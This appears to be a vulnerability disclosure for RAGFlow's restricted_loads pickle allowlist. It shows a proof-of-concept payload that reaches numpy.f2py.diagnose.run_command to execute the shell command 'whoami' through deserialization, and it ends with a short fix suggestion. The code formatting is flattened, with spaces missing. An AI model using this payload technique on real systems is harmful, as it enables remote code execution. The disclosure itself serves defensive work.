Use this section to tell people about which versions of your project are currently being supported with security updates.
| Version | Supported |
|---|---|
| <=0.7.0 | ✅ |
main
The restricted_loads function atapi/utils/init.py#L215is still vulnerable leading via code execution. The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
ragflow_patch.py
importbuiltins
importio
importpickle
safe_module={
'numpy',
'rag_flow'
}
classRestrictedUnpickler(pickle.Unpickler):
deffind_class(self,module,name):
importimportlib
ifmodule.split('.')[0]insafe_module:
_module=importlib.import_module(module)
returngetattr(_module,name)
# Forbid everything else.
raisepickle.UnpicklingError("global '%s.%s' is forbidden"%
(module,name))
defrestricted_loads(src):
"""Helper function analogous to pickle.loads()." ""
returnRestrictedUnpickler(io.BytesIO(src)).load()Then,PoC.py
importpickle
fromragflow_patchimportrestricted_loads
classExploit:
def__reduce__(self):
importnumpy.f2py.diagnose
returnnumpy.f2py.diagnose.run_command,('whoami',)
Payload=pickle.dumps(Exploit())
restricted_loads(Payload)Result
Strictly filter the module and name before calling with getattr function.